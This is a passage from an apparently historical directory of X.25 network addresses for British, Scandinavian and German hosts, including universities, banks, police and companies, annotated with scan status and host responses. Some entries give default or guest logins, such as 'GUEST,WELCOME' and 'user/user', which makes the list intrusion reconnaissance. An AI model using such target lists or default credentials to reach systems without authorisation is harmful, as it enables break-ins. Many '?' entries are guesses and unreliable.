  2039.   0234 234 417 117                 ICL at Bracknell
  2040.   0234 227 230 333                 ?
  2041. B 0234 239 232 323      EXETER1    Exeter University
  2042.   0234 239 232 32304    EXTR       University of Exeter
  2043.   0234 241 200 107
  2044.   0234 241 260 106      SCRSX      University of Strathcylde PDP-11/44 (RSX)
  2045. A 0234 241 260 10604               ? (,5020015,Birch/Bryan)
  2046.   0234 241 260 260      GLSG       University of Glasgow (NFS)
  2047. B 0234 241 260 26004               Glasgow
  2048.   0234 246 200 10243               ICL West Gorton 'B' Service
  2049.   0234 246 200 10248               ICL West Gorton 'X' Service
  2050.   0234 246 200 10277               ICL West Gorton Perq
  2051.   0234 246 240 240      ICLL       ICL at Letchworth (=Kidsgrove?) (NFS)
  2052.   0234 247 300 103                 MTIER Management Systems Ltd.
  2053.   0234 247 300 10300               Bridge, Switch
  2054.   0234 247 300 10340               Bridge, (VAX/VMS)
  2055.   0234 247 300 10345               Bridge, (MUX(VT100))
  2056.   0234 247 300 10346               Bridge
  2057.   0234 247 302 022      MHGA       LDC at Martlesham
  2058.   0234 248 300 106                 DWENT-SDC Search Service
  2059.   0234 248 321 321                 DWENT-SDC Search Service
  2060. B 0234 251 248 248      LIVE       University of Liverpool
  2061.   0234 252 724 241      BSL        BL Systems Ltd.
  2062.   0234 253 265 165      LEEDS      University of Leeds (NFS)
  2063.   0234 253 300 124      CAMTEC     Camtec, Leicester
  2064.   0234 253 300 12406    CAMTEC     Camtec, Leicester (hard copy printer)
  2065.   0234 258 200 106      ARC        Agricultural Research Council (GEC -
  2066.                                    Switch)
  2067.   0234 258 200 106      EMALFTP    East Malling (FTP)
  2068.   0234 258 200 106      RESFTP     RES (Rothampstead) - FTP
  2069.   0234 258 200 10604    AGRIFTP    AGRINET (CPSE) FTP
  2070.   0234 258 200 10604    AGRINET    AGRINET Gateway
  2071.   0234 258 200 10604    EASTMAL    East Malling
  2072.   0234 258 240 242      GECD       GEC Computers Ltd at Dunstable
  2073.   0234 258 240 24200    MRCA       GEC - Marconi Research Centre
  2074. B 0234 260 227 227      MIDN       MIDNET Gateway at Nottingham (University
  2075.                                    Leicester?) (=MIDNOT?)
  2076. B 0234 261 456 8383                Microlink
  2077. B 0234 261 600 119                 Manchester
  2078.   0234 261 600 133                 IBM - SALE (also FTP)
  2079. B 0234 261 600 152      UMDAFL     University of Manchester Dataflow VAX
  2080.   0234 261 643 143      UMRCC      University of Manchester Regional Computer
  2081.                                    Centre
  2082.   0234 261 643 14398    UMRFTP     UMRCC (FTP)
  2083.   0234 261 643 210      SALF       Salford University
  2084.   0234 261 643 21090    SALFORD    Salford -> GANNET
  2085.   0234 261 643 21090   NRS        NRS
  2086. B 0234 261 643 343      FERRANTI   Feranti Computer Systems
  2087.   0234 261 643 365                 ICLBRA
  2088.   0234 261 643 36543               ICL West Gorton 'B' Service
  2089.   0234 261 643 36548               ICL West Gorton 'X' Service
  2090.   0234 261 643 36577               ICL West Gorton Perq (also FTP)
  2091.   0234 262 500 484                 Software Sciences Ltd.
  2092. B 0234 262 800 151                 CDM/EH (=Maidenhead?)
  2093.   0234 262 800 43300
  2094. B 0234 263 259 159      NUMAC      University of Newcastle
  2095.   0234 264 200 136                 Primenet
  2096. B 0234 270 500 115                 MAXXIM
  2097. B 0234 270 500 142                 Farenham
  2098. T 0234 270 500 15                  Uni Brighton (GUEST,WELCOME)
  2099.   0234 270 712 217      HATF       Hatfield Polytechnic
  2100.   0234 273 417 171      DEC-RDG    Digital Equipment Ltd Reading
  2101.   0234 273 417 217      MODC       Modcomp
  2102.   0234 273 417 317      DECR       DEC at Reading
  2103.   0234 274 200 103                 SHEFFIELD, University of, Dept.of
  2104.                                    Electronic & Elec...
  2105.   0234 274 200 103*DCODUCODUS      Codus
  2106.   0234 274 253 385                 DVY Computing Ltd.
  2107.   0234 274 317 31
  2108.   0234 275 300 102                 GIS Ltd.
  2109.   0234 275 312 212      BOC        British Oxygen (=The World Reporter??)
  2110.   0234 275 312 212      DATASOLVE  as above
  2111.   0234 275 312 212      EUROLEX    British Oxygen Company
  2112.   0234 275 317 173                 Lynx Computers Ltd.
  2113.   0234 275 317 177                 TELEFILE Computer Services Ltd.
  2114.   0234 275 317 177      GSI        GSI (NFS)
  2115.   0234 278 228 282                 ICL Letchworth
  2116.   0234 278 228 288                 ICL Letchworth
  2117.   0234 284 400 108                 Culham, (VAX)
  2118.   0234 284 400 123      ALVEY      Alvey Electronic Mail
  2119. B 0234 289 500 109                 UXB
  2120.   0234 290 468 168      YORK       York University PSS Gateway
  2121. B 0234 290 468 168      YORKFTP    York University (FTP)
  2122.   0234 290 468 168                 Gateway To DEC-10 At York
  2123.   0234 290 468 16804    YORKTS     York TS29 Port
  2124.   0234 290 524 242      RSRE       Radio, Space Research Establishment
  2125.   0234 290 524 24203    RSREDL     RSRE
  2126.   0234 290 524 24204    RSRESNK    RSRE
  2127.   0234 290 524 24250   RSREA      Radio, Space Research Establishment for
  2128.                                    ALVEY mail
  2129.   0234 290 840 111      POLIS      SCION
  2130.   0234 290 840 111      SCICON     SCICON, South England
  2131.   0234 292 549 149      DL         SERC at Daresbury Laboratory
  2132.   0234 293 212 212                 DATASOLVE LTD.
  2133.   0234 293 212 212      BOC        British Oxygen Company (NFS)
  2134. D 0234 293 765          ARTTEL     British Library, Boston Spa
  2135.   0234 293 765 265                 British Library Lending Divi.
  2136.   0234 299 212 221      NOLTON     Nolton Communications Ltd. (NFS)
  2137.   0234 3                           Euronet
  2138.   0234 307 813          EUROINFO   Euronet Diane Information Service
  2139.   0234 8                TELEX      UK Telex network
  2140.   0234 892 992 0        DECTELX
  2141. I 0235 200 143 00165
  2142.   0238                  DK         Denmark
  2143.   0238 2                           Datapak
  2144. A 0238 241 592 400                 Valby I/S Datacentralen
  2145. A 0238 241 745 600      RECKU      Univac in Copenhagen University
  2146.   0238 241 745 60000               Recku Univac (Enter @@ENQ)
  2147.   0238 241 745 60002    UDIKU
  2148. A 0238 242 126 400                 Lyngby DTB; I/S Datacentralen
  2149. I 0238 389 3                       Euronet Aarhus
  2150.   0240                  S          Sweden
  2151. I 0240 181 559 76       LIUIDA S   Linkvping LiUIDA Teletex
  2152.   0240 2                           Datapak
  2153. A 0240 200 002 05                  Uppsala STUNS VAX/UNIX KULING
  2154. I 0240 200 044 4        ENEA       ENEA
  2155. A 0240 200 100 110                 Stockholm QZ/DEC-10
  2156. A 0240 200 100 120                 Stockholm QZ/CD Cyber 730
  2157. O 0240 200 100 203                 Uppsala, UU, Teknikum, NORD 100/500
  2158. A 0240 200 100 205                 Uppsala, UU, Stuns, VAX 750
  2159. A 0240 200 100 206                 Uppsala, UDAC/DECnet RTR18A
  2160. O 0240 200 100 207                 Uppsala, UDAC, Cyber 835
  2161. A 0240 200 100 228                 Uppsala, UDAC/UPNET - Terminalnaet
  2162. A 0240 200 100 232                 Uppsala, UDAC, IBM/GUTS (BASF 7/68 ?)
  2163. O 0240 200 100 28                  Uppsala Upnet
  2164. ? 0240 200 100 30                  Umeaa VAX-750 Skogsh. Umeaa Univ
  2165. A 0240 200 100 303                 Umeaa, UMDAC/BIOVAX
  2166. A 0240 200 100 304                 Umeaa, Skogshoegskolan, VAX 750
  2167. A 0240 200 100 305                 Umeaa, UMDAC/DECnet RTR09A, (Vax 11/750)
  2168. A 0240 200 100 30520               Umeaa, UMDAC/BASUN
  2169. A 0240 200 100 30540               Umeaa, UMDAC/UTB1 (Vax 11/780)
  2170. A 0240 200 100 30550               Umeaa, UMDAC/UTB2 (Vax 11/750)
  2171. A 0240 200 100 30570               Umeaa, UMDAC/OSTVAX (Vax 11/780, Hoegsk i
  2172.                                    Oe-sund)
  2173. A 0240 200 100 307                 Umeaa, UMDAC/Cyber 850
  2174. D 0240 200 100 312                 Luleaa, Tekn hoegsk, NORD 100
  2175. D 0240 200 100 313                 Luleaa, Tekn hoegsk, NORD 100
  2176. A 0240 200 100 328                 Umeaa, UMDAC/NUNET - Terminalnaet
  2177. D 0240 200 100 33                  Umeaa VAX-11/780
  2178. A 0240 200 100 403                 Linkoeping, ULi/LIUIDA, uVAX-I
  2179. D 0240 200 100 404                 Linkoeping, ULi/PDP 11/23 BULL
  2180. A 0240 200 100 405                 Linkoeping, LIDAC, VAX 11/780 VIKTOR
  2181. A 0240 200 100 407                 Linkoeping, LIDAC/DECnet RTR13A, uVAX-II
  2182. D 0240 200 100 432                 Linkoeping, LIDAC/TEXAS - Terminalnaet
  2183. A 0240 200 100 7                   Primenet
  2184. A 0240 200 101 903                 Stockholm, SU, Psykologi, Prime 750
  2185. A 0240 200 101 904                 Stockholm, QZ IBM (Amdahl)
  2186. A 0240 200 101 905                 Stockholm, QZ, NFRVAX
  2187. A 0240 200 101 907                 Stockholm, QZ/DECnet RTR08A
  2188. A 0240 200 101 914                 Stockholm, SU, Fysik, Vax 780
  2189. D 0240 200 101 926                 Stockholm, KTH/KTHNET - Terminalnaet
  2190. A 0240 200 101 928                 Stockholm, QZ/QZNET - Terminalnaet
  2191. O 0240 200 102 06                  Uppsala UDAC uVAX-II RTR18A
  2192. O 0240 200 102 07                  Uppsala CD Cyber 835
  2193. A 0240 200 102 7                   Stockholm DEC-10/Janus
  2194. A 0240 200 102 71                  Stockholm DEC-10/Janus
  2195. A 0240 200 201 603                 Goeteborg, CTH, Infobeh, VAX 750, Unix
  2196. D 0240 200 201 604                 Goeteborg, GU, Pedagogiska inst, Prime 550
  2197. A 0240 200 201 605                 Goeteborg, GU, Statistiska inst, Prime 550
  2198. D 0240 200 201 606                 Goeteborg, CTH, Tillaempad Elektronik, VAX
  2199.                                    750
  2200. A 0240 200 201 607                 Goeteborg, Tillaempad Elektronik/DECnet
  2201.                                    RTR31A (RTR18A ?)
  2202. A 0240 200 201 628                 Goeteborg, GD/GUCNET - Terminalnaet
  2203. D 0240 200 201 632                 Goeteborg Upnod
  2204. A 0240 200 205 4                   SCB
  2205. A 0240 200 278 0                   Oerebro, Hoegskolan, Prime
  2206. A 0240 200 292 6                   Karlstad, Hoegskolan, VAX 11/780
  2207. D 0240 200 310 204                 Lund, Fysikum, NORD 500, Lucas
  2208. O 0240 200 310 206                 Lund, Maxlab, NORD 100
  2209. A 0240 200 310 207                 Lund, LDC/DECnet RTR46A, uVAX-II
  2210. A 0240 200 310 20720               Lund, LDC/GEMINI, Vax 8350
  2211. A 0240 200 310 228                 Lund, LDC/LUNET - Terminalnaet
  2212.   0240 201 001 30                  Stockholm QZ/Amdahl
  2213.   0240 201 002 03                  Uppsala Teknikum Nord 100/500
  2214.   0240 5                SWEDEN     Swedish data network (Telepak)
  2215. I 0240 500 025 3        QZXB       QZ by yet another route
  2216. I 0240 500 025 7                   Stockholm, DEC, VAX
  2217. I 0240 501 50                      Scannet, Goteborg
  2218. I 0240 501 51                      Scannet, Helsingfors
  2219. I 0240 501 52                      Stockholm KTH/TTDS
  2220. I 0240 501 531 0        QZCOM      QZ-COM - Stockholm University DEC-10
  2221. I 0240 501 532 0        QZCB       QZ Cyber
  2222. I 0240 501 533 0        QZIB       QZ Amdahl
  2223. I 0240 501 54           UPPS       Uppsala network, Sweden
  2224. I 0240 501 550 3                   Gottenburg, Sweden
  2225. I 0240 501 582 8        LUND       Lund University
  2226. I 0240 501 60                      Helsinki CP9500 HYLK B7800
  2227. I 0240 502 00                      Scannet, Stockholm
  2228. I 0240 502 01                      Denmark, Copenhagen Scannet
  2229. I 0240 502 02                      Tandem Computers
  2230. I 0240 502 032 8        QZXA       QZ Sweden via reverse PAD (=UPNET?)
  2231. I 0240 502 032 832                 Oden, Sweden
  2232. I 0240 502 033 2        QZDA       QZ DEC-10 Sweden
  2233. I 0240 502 04                      Prime Computers
  2234. I 0240 502 05                      Vaesteraas PAD ASEA Multics
  2235. I 0240 502 52                      KEMIDATA
  2236. I 0240 502 53           QZXB       QZ by yet another route
  2237.   0240 515 330                     Amdahl
  2238.   0242                  N          Norway
  2239.   0242 2                NORWAY     Norwegian data network (Datapak/Norpak)
  2240.   0242 192 010 1013                PSS DOC
  2241. X 0242 211 000 00107    OSLO       DEC-1099 DEC-net/PSI at Oslo University
  2242. D 0242 211 000 001*D02             Oslo univ BRU-nett UNINETT
  2243. D 0242 211 000 001*D03  OSLO       DEC-10 at Oslo University
  2244. D 0242 211 000 00100               Oslo univ DEC-1099 UNINETT
  2245. D 0242 211 000 002                 Oslo Scannet NSI Nord-100
  2246. D 0242 211 000 01018    DATAPIN    DATAPAK Info - Norway
  2247. B 0242 211 000 074                 Oslo VAX
  2248. T 0242 223 000 00151    RBK        Cyber 170 at IFE (Energy Research Centre)
  2249. T 0242 223 000 001*D00  RBK        Cyber 170 at IFE, Kjeller RBK UNINETT
  2250. D 0242 223 000 002                 Kjeller FFI UNINETT
  2251. D 0242 245 000 00101    BERGEN     Univac at Bergen University (UNINETT)
  2252. D 0242 245 000 001*D00  BERGEN     Univac at Bergen University
  2253. A 0242 245 013 4                   BBB Mailbox (Bergen By Byte)
  2254.   0242 253 000 001*D11             Trondheim UNINETT RUNIT UNIVAC
  2255. T 0242 253 000 00101    RNI        Univac at Trondheim University
  2256. X 0242 253 000 00103               Trondheim RUNIT UNINETT VAX-780 (=PUNIT
  2257.                                    (EANNET) ?)
  2258. T 0242 253 000 00104               Trondheim NLHT UNINETT VAX-750
  2259.   0242 265 000 001*D00             Tromso UNINETT U of Tromso, Cyber 171
  2260.   0242 253 000 001*D11  RUNIT      Univac at Trondheim University
  2261.   0242 265 000 001*D81             Tromso UNINETT U of Tromso, NORD-10
  2262.   0242 265 000 001*D82             Tromso UNINETT U of Tromso, NORD-100
  2263.   0242 265 000 001*D83             Tromso UNINETT U of Tromso, NORD-500
  2264.   0242 265 000 00101    TROMSOE    Cyber 170 at Tromsoe University (UNINETT)
  2265.   0242 265 000 001*D81  TROMSO     ELAN at Tromsoe University
  2266. X 0242 265 000 106                 PORTACOM (PORTACOM)
  2267.   0244                  SF         Finland
  2268.   0244 2                           Datapak (Finpak)
  2269. A 0244 202 006                     Economics HP 3000
  2270. A 0244 202 007                     University of Helsinki, B7800 (=CANDE ?)
  2271. A 0244 202 008                     VTKK (Staten DC) IBM 360
  2272. A 0244 202 012                     U o Helsinki Mopo Mikko3
  2273. A 0244 203 008          HELVA      High Energy Physics Vax 11/750
  2274. A 0244 203 017                     U of Technology DEC-20
  2275. D 0244 231 006                     Technical University of Tampere VAX
  2276. A 0244 253 001                     Tech U of Lappeenranta VAX/VMS
  2277. A 0244 261 001                     U of Vaasa VAX/VMS
  2278. A 0244 273 002                     University of Joensuu VAX
  2279. D 0248 321 321                     DWENT-SDC Search Service
  2280.   0262                  D          Germany
  2281.   0262 3                           Euronet
  2282. X 0262 307 4                       INFAS
  2283.   0262 4                GERMANY    German data network (Datex-P)
  2284. I 0262 428 462 10706
  2285. I 0262 428 479 11065
  2286. D 0262 432 210 43002               Apple
  2287. Ar0262 432 210 93001               Quick-Com
  2288. Y 0262 442 010 49132
  2289. O 0262 442 110 40325               OKI
  2290. Y 0262 442 110 49130               PAD Frankfurt
  2291. Y 0262 442 110 49133
  2292. Y 0262 442 110 49230
  2293. I 0262 442 151 40327               KIS (info)
  2294. I 0262 442 210 49331
  2295. A 0262 442 210 90371               elma-mailbox (~pim)
  2296. Y 0262 442 210 99632
  2297. O 0262 442 310 40312               Bibliothek  Chemie
  2298. I 0262 442 310 90306               Chemie
  2299. I 0262 442 410 40341    RMI        RMI Mailbox Aachen
  2300. I 0262 442 433 40307               CMES
  2301. O 0262 442 461 40343
  2302. Y 0262 443 000 49234
  2303. A 0262 443 000 90314               ?
  2304. Y 0262 443 000 99131
  2305. I 0262 444 000 90314               CCC Hamburg (Clinch), Hackerbox (1 line...)
  2306. Y 0262 444 000 90330               Allgemeine Bank der Niederlande
  2307. O 0262 444 000 90342               Batig Beteiligungen GmbH
  2308. A 0262 444 000 90374               Master Control System (MCS) Hamburg
  2309. Y 0262 444 000 99132
  2310. Y 0262 444 441 40317               Osnabrueck, Driverstr.24, 2848 Vechta
  2311. I 0262 445 110 30317               Metereologie
  2312. I 0262 445 110 90323               Bibliothek
  2313. I 0262 446 154 40371               DECATES - Oberramstadt
  2314. Y 0262 446 210 49330
  2315. Y 0262 446 810 49131
  2316. Y 0262 446 810 49132
  2317. O 0262 446 900 30331               IBD Online Frankfurt a.M.
  2318. I 0262 446 900 40318               Chemie
  2319. Y 0262 446 900 49231
  2320. Y 0262 446 900 49232
  2321. I 0262 446 900 90286               RZ
  2322. Y 0262 446 900 99133
  2323. O 0262 447 071 10303               Organische Chem.
  2324. Y 0262 447 110 49134
  2325. I 0262 447 114 9236                Emery
  2326. I 0262 447 127 90344
  2327. Y 0262 447 310 40313               Online-Literaturdok.
  2328. A 0262 447 531 40310               Chemie
  2329. I 0262 448 136                     Luma Uni
  2330. O 0262 448 136 90323               Genesys EDV-Systeme
  2331. Y 0262 448 210 49630
  2332. A 0262 448 900 30368               Phoenix
  2333. Y 0262 448 900 49130
  2334. A 0262 448 900 90313               Max Planck Institut
  2335. Y 0262 448 900 90341               LMU Bibliothek
  2336. Y 0262 448 900 99632
  2337. I 0262 449 310 90312               Apel Hans-Joerg
  2338. I 0262 452 000 21721               ???
  2339. I 0262 450 000 90184
  2340. I 0262 451 104 2301
  2341. O 0262 452 010 40116               AEG-Telefunken
  2342. I 0262 452 010 40179               RZ Uni Essen
  2343. I 0262 452 020 40120               Apotheke Dr.Schiemes
  2344. I 0262 452 080 40381               DVO Datenverarbeitung
  2345. I 0262 452 090 832                 ?
  2346. I 0262 452 101 30030               3M Mailbox
  2347. I 0262 452 101 40030               3M Mailbox
  2348. I 0262 452 110 40001               RZU Duesseldorf (ND100)
  2349. I 0262 452 110 40005               CIERR 1402
  2350. I 0262 452 110 40016               ADV-Orga-Meyer & Co.
  2351. I 0262 452 110 40018               ADV-Orga-Meyer & Co.
  2352. Ar0262 452 110 40026               Primenet Stadt Duesseldorf,
  2353. I 0262 452 110 40063               ADAC
  2354. I 0262 452 110 40080               Uni Duesseldorf
  2355. Dr0262 452 110 40099
  2356. D 0262 452 110 40105               RZU Duesseldorf (Siemens 7.570)
  2357. D 0262 452 110 40123               Data General
  2358. Ar0262 452 110 40130
  2359. Dr0262 452 110 40132
  2360. A 0262 452 110 40134               MCKDU VM/SP
  2361. I 0262 452 110 40211               Applid-Data-Research
  2362. I 0262 452 110 40325               OKI-GmbH
  2363. I 0262 452 110 90371               Software-Express
  2364. I 0262 452 210 0
  2365. Yr0262 452 210 40002               DIMDI Fep 1 Koeln
  2366. Ar0262 452 210 40004               Primenet (MicroVMS V4.5)
  2367. A 0262 452 210 40006               DIMDI Fep 2 Koeln  (Medical docs)
  2368. I 0262 452 210 40015               Kaufhof AG
  2369. I 0262 452 210 40027               ADAC
  2370. Ar0262 452 210 40035               Primenet
  2371. A 0262 452 210 40104               DIMDI1  (German Med. Inst., Koeln)
  2372. Yr0262 452 210 40119
  2373. O 0262 452 210 40136               AEG-Telefunken
  2374. I 0262 452 210 40202               Allianz RZ
  2375. I 0262 452 210 40203               Allianz RZ
  2376. I 0262 452 210 90265               RZ Uni Koeln
  2377. I 0262 452 210 90304               Allianz RZ
  2378. I 0262 452 210 90305               Allianz RZ
  2379. I 0262 452 210 90349               Kaufhof AG (RZ 2)
  2380. D 0262 452 210 90510               Geophysik und Meteorologie
  2381. Ir0262 452 210 93001               ?
  2382. A 0262 452 241 24104               VAX
  2383. A 0262 452 241 24105               GMD2
  2384. A 0262 452 241 24134               GMDZI
  2385. A 0262 452 280 40082               GMD (TSO)
  2386. A 0262 452 280 40187    BNVA       Bonn VAX (PI)
  2387. Ar0262 452 280 40191               Infas GmbH (VM)
  2388. D 0262 452 280 90020               Amtsgericht
  2389. A 0262 452 310 40003    EMX1       EMEX-Mailbox (Guest)
  2390. I 0262 452 310 40017               Primenet
  2391. O 0262 452 310 40103               AEG-Telefunken
  2392. A 0262 452 310 42100               Informatik
  2393. A 0262 452 310 42144    UNIDO      University of Dortmund
  2394. I 0262 452 310 40017               Primenet
  2395. I 0262 452 310 45100               Uni Dortmund (Siemens 7.760)
  2396. A 0262 452 310 9304                Dortmund
  2397. D 0262 452 340 40140               Primenet = RZU Bochum (CDL 855) ??
  2398. A 0262 452 340 40194    RUB        Cyber 205 (=855?), Ruhr University - Bochum
  2399.                                    (RUB)
  2400. D 0262 452 410 40149               Aachener + Muenchener Versicherung
  2401. I 0262 452 410 90014               ???
  2402. I 0262 452 410 90528               rmi-aachen
  2403. A 0262 452 410 90832               RMI Datentechnik Aachen
  2404. I 0262 452 433 40307               OPTEL (Ruehlemann-Box)
  2405. I 0262 452 461 90509               Kfz Juelich
  2406. A 0262 452 710 40240               Uni Siegen, FB Physik (VAX 11/750)
  2407. D 0262 452 931 40196               Handwerkskammer (HWK) Arnsberg
  2408. I 0262 453 000 0414                GFC-AG
  2409. D 0262 453 000 20104               Vax
  2410. D 0262 453 000 217      HMI        HMI in Berlin
  2411. A 0262 453 000 21711               Siemens
  2412. A 0262 453 000 21712               Siemens
  2413. A 0262 453 000 21713               Hahn-Meitner-Institut Berlin
  2414. D 0262 453 000 21714               ???
  2415. D 0262 453 000 40013               Uni Berlin
  2416. Y 0262 453 000 40014               GFC AG
  2417. Ar0262 453 000 40023    BERLIN     Tech. Univ. Berlin (Computer Science)
  2418. I 0262 453 000 40027               ADAC
  2419. I 0262 453 000 40112               ABC Barkredit Bank
  2420. I 0262 453 000 40166               David Verlag
  2421. I 0262 453 000 40509               COM-Box Berlin
  2422. A 0262 453 000 20205               CN01
  2423. A 0262 453 000 43109               netmbx, Berlin
  2424. A 0262 453 000 90055               COM.BOX, Berlin
  2425. A 0262 453 000 90864               ? (GUEST)
  2426. I 0262 453 002 17       HMI        Hans Mietner Institute in Berlin
  2427. I 0262 453 004 0023                Uni Berlin
  2428. I 0262 453 210 40017               tymnet-gateway
  2429. I 0262 454 000 30029
  2430. A 0262 454 000 30035               (immediately drops the line)
  2431. A 0262 454 000 30041               COM-PLETE (?) (command prefix is '*')
  2432. A 0262 454 000 30046               (immediately drops the line)
  2433. O 0262 454 000 30071
  2434. A 0262 454 000 30090               (cierr 1402)
  2435. A 0262 454 000 30104               ? ("INVALID COMMAND SYNTAX")
  2436. A 0262 454 000 30105
  2437. A 0262 454 000 30110               Host
  2438. A 0262 454 000 30113               (cierr 1402)
  2439. A 0262 454 000 30138               ? (no reaction)
  2440. D 0262 454 000 30150
  2441. D 0262 454 000 30158
  2442. A 0262 454 000 30175               ? ("INVALID COMMAND SYNTAX")
  2443. D 0262 454 000 30187               E2000 Hamburg VAX
  2444. O 0262 454 000 30201               Hasylab VAX (user/user)
  2445. A 0262 454 000 30202               HERA Magnet Measurement VAX 750 (=Krista
  2446.                                    Cryogenics Control ?)
  2447. A 0262 454 000 30215               ? ("INVALID COMMAND SYNTAX")
  2448. D 0262 454 000 30259
  2449. D 0262 454 000 30261
  2450. A 0262 454 000 30296               DFH2001I
  2451. A 0262 454 000 30502
  2452. I 0262 454 000 30519
  2453. A 0262 454 000 30566               DFH2001I
  2454. O 0262 454 000 30578               Primenet 20.0.4 DREHH
  2455. I 0262 454 000 40014               Hahn Egon RZ !! Code: EBCDIC !!
  2456. I 0262 454 000 40015               ???
  2457. Y 0262 454 000 40042               ???
  2458. D 0262 454 000 40044               Primenet MUF
  2459. I 0262 454 000 40053               SCHERAX
  2460. Y 0262 454 000 40078               ???
  2461. A 0262 454 000 40082               ? (no reaction)
  2462. I 0262 454 000 40103               Airbus
  2463. I 0262 454 000 40109               ???
  2464. I 0262 454 000 40111               BADGER
  2465. D 0262 454 000 40198               Argus IPP-Vax
  2466. I 0262 454 000 43100               ADV-Orga-Meyer & Co.
  2467. A 0262 454 000 50233               Altos Hamburg (althh) (Gast)
  2468. I 0262 454 000 8001     DYVA       MARK J VAX at DESY
  2469. I 0262 454 000 90047               AEG-Telefunken
  2470. A 0262 454 000 90092               Data-General
  2471. A 0262 454 000 90184               Uni Hamburg (VAX) (=UKE?)
  2472. I 0262 454 000 90194               Verbraucherbank AG
  2473. O 0262 454 000 90241               ???
  2474. I 0262 454 000 90258               Desy ( Vax )
  2475. I 0262 454 000 90558               Philips VAX
  2476. D 0262 454 000 90560    EMBLHH     EMBL VAX at Hamburg (Eur.Molecular
  2477.                                    Biol.Lab.)
  2478. I 0262 454 000 905602              ???
  2479. A 0262 454 000 90582               Desy V.24 Switch
  2480. A 0262 454 000 91110               Deutsche Mailbox 1
  2481. A 0262 454 000 91120               Deutsche Mailbox 2
  2482. A 0262 454 000 92210               DESYNET
  2483. A 0262 454 000 9306     DYVA       MARK J VAX at DESY
  2484. D 0262 454 103 90161               Astra Chemicals GmbH
  2485.   0262 454 106 40206               RCA
  2486. A 0262 454 210 40064               COMTES
  2487. O 0262 454 210 40108               AEG-Telefunken
  2488. I 0262 454 210 40145               AEG-Telefunken
  2489. Y 0262 454 210 40244               AEG-Telefunken
  2490. O 0262 454 210 42001               Bremen
  2491. I 0262 454 210 90302               Computerland VAX
  2492. O 0262 454 298 43070               Infex 2
  2493. I 0262 454 310 40545               Kiel IMF
  2494. A 0262 454 410 30033               Uni Oldenburg
  2495. I 0262 454 421 40045               ADV-Orga-Meyer & Co.
  2496. I 0262 454 488 40147               Essmann Getraenke GmbH
  2497. I 0262 455 110 40081               Airbus
  2498. I 0262 455 110 40171               Alli-Frischdienst
  2499. A 0262 455 110 42330               Uni Hannover (VM/370)
  2500. A 0262 455 110 43020               Nachrichtentechnik (VAX)
  2501. I 0262 455 110 701                 Uni Hannover
  2502. A 0262 455 110 90192               ???
  2503. A 0262 455 110 90835               CosmoNet (GAST)
  2504. A 0262 455 110 92200               RZ
  2505. D 0262 455 151 40212               AEG-Telefunken
  2506. I 0262 455 152 90154               Oldenburger Volksbank
  2507. I 0262 455 210 40562               Uni Bielefeld (CGK/TR440)
  2508. I 0262 455 251 90192               Paderborn
  2509. D 0262 455 251 90193               Paderborn
  2510. A 0262 455 251 93020               Uni Paderborn (4.3 BSD UNIX)
  2511. D 0262 455 362 90057               IUM
  2512. I 0262 455 410 40086               Alli-Frischdienst
  2513. I 0262 455 410 40162               RZ
  2514. I 0262 455 410 40560               Bibliothek
  2515. I 0262 455 421 043050              ORION
  2516. A 0262 455 510 32804               Uni Goettingen (choose VAX or IBM)
  2517. I 0262 455 521 90172               Spar & Darlehenskassen
  2518. I 0262 455 818 104                 Anders Frido GmbH
  2519. I 0262 455 910 40094               Essmann Getraenke GmbH
  2520. I 0262 455 931 40095               Ruhr AG
  2521. I 0262 456 061 40097               Polydress Plastic GmbH
  2522. I 0262 456 102 4301                DEC Frankfurt
  2523. I 0262 456 102 90145               Nadler-Werke GmbH
  2524. I 0262 456 103 40332               Amann KG
  2525. I 0262 456 104 0250                Tymnet
  2526. A 0262 456 106 40254               Alfa Service Partner (Primenet)
  2527. I 0262 456 106 90119               Alfa Service Partner
  2528. I 0262 456 110 40009               IBM  Centre for Info and Doc, Germany
  2529. I 0262 456 110 40037               Control Data (Test.-Serv.C4,ZZA201,CDC)
  2530. I 0262 456 110 40076               Autonet
  2531. I 0262 456 110 40105               Nixdorf Computer
  2532. I 0262 456 110 40106               Nixdorf Computer
  2533. I 0262 456 110 40107               CN01
  2534. I 0262 456 110 40187               WAX Bank FRA
  2535. I 0262 456 110 40240               City-Bank FFM (Uni Bochum ??)
  2536. I 0262 456 110 40245               ??
  2537. I 0262 456 110 40250               Tymnet (Id=Information)
  2538. I 0262 456 110 40303               American Express
  2539. I 0262 456 110 40305               American Express
  2540. I 0262 456 110 40311               AMC
  2541. I 0262 456 110 40365               AMP
  2542. I 0262 456 110 90211               Nixdorf Computer
  2543. I 0262 456 110 90212               Nixdorf Computer
  2544. I 0262 456 110 90322               American Express
  2545. I 0262 456 110 90347               American Express
  2546. I 0262 456 121 40207               ADV-Orga-Meyer & Co.
  2547. I 0262 456 121 40217               BKA
  2548. I 0262 456 121 40225               BKA
  2549. I 0262 456 121 90580               BKA
  2550. I 0262 456 131 40138               Uni Mainz RZ
  2551. I 0262 456 131 40545               RZ
  2552. Y 0262 456 131 90031               Allg.Kreditversicherung
  2553. Y 0262 456 151 40282               ???
  2554. A 0262 456 151 40516               Uni Darmstadt (Siemens 7.xxx)
  2555. A 0262 456 151 40547               GSI Darmstadt (EMMA-VAX 8600)
  2556. A 0262 456 151 42807               GMD Darmstadt (CADMUS 9240)
  2557. I 0262 456 172 90070               A-Kredit
  2558. I 0262 456 193 40082               Apotheken Marketing
  2559. D 0262 456 196 40095               Data General Schwalbach
  2560. A 0262 456 196 40107               Int.Doc.Chem.
  2561. A 0262 456 210 40000               Telebox der DBP (ID INF100,Telebox)
  2562. A 0262 456 210 40014               ACF/VTAM
  2563. A 0262 456 210 40025               Oeva
  2564. A 0262 456 210 40026               HOST
  2565. D 0262 456 210 40027               BASF/FER.VAX 8600
  2566. I 0262 456 210 40097               Nadler-Werke GmbH
  2567. I 0262 456 210 40217               Primenet
  2568. I 0262 456 210 40324               Abacus
  2569. D 0262 456 210 40508               VCON0.BASF.A6
  2570. A 0262 456 210 40516               CN01
  2571. A 0262 456 210 40532
  2572. A 0262 456 210 40580               DYNAPAC MULTI-PAD.25
  2573. A 0262 456 210 40581               DYNAPAC MULTI-PAD.25
  2574. A 0262 456 210 40582
  2575. A 0262 456 210 90000               Telebox der DBP
  2576. I 0262 456 221 3002     EMBL       European Microbiology Lab (or European
  2577.                                    Molecular Biological Lab.) (=ALKOR?)
  2578. D 0262 456 221 40201               DKFZ (Heidelberg)
  2579. I 0262 456 221 40244               Franny (=Max Planck VAX=MPI?)
  2580. I 0262 456 310 40252
  2581. I 0262 456 310 421
  2582. D 0262 456 310 424
  2583. I 0262 456 310 4302
